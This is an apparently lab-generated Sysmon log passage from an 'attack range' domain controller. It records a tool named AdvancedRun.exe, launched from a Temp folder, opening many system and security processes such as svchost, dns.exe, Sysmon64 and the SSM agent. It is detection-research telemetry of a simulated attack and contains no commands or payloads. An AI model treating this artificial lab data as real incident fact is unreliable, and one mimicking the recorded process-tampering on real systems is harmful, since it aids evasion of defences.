20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.044{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.042{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~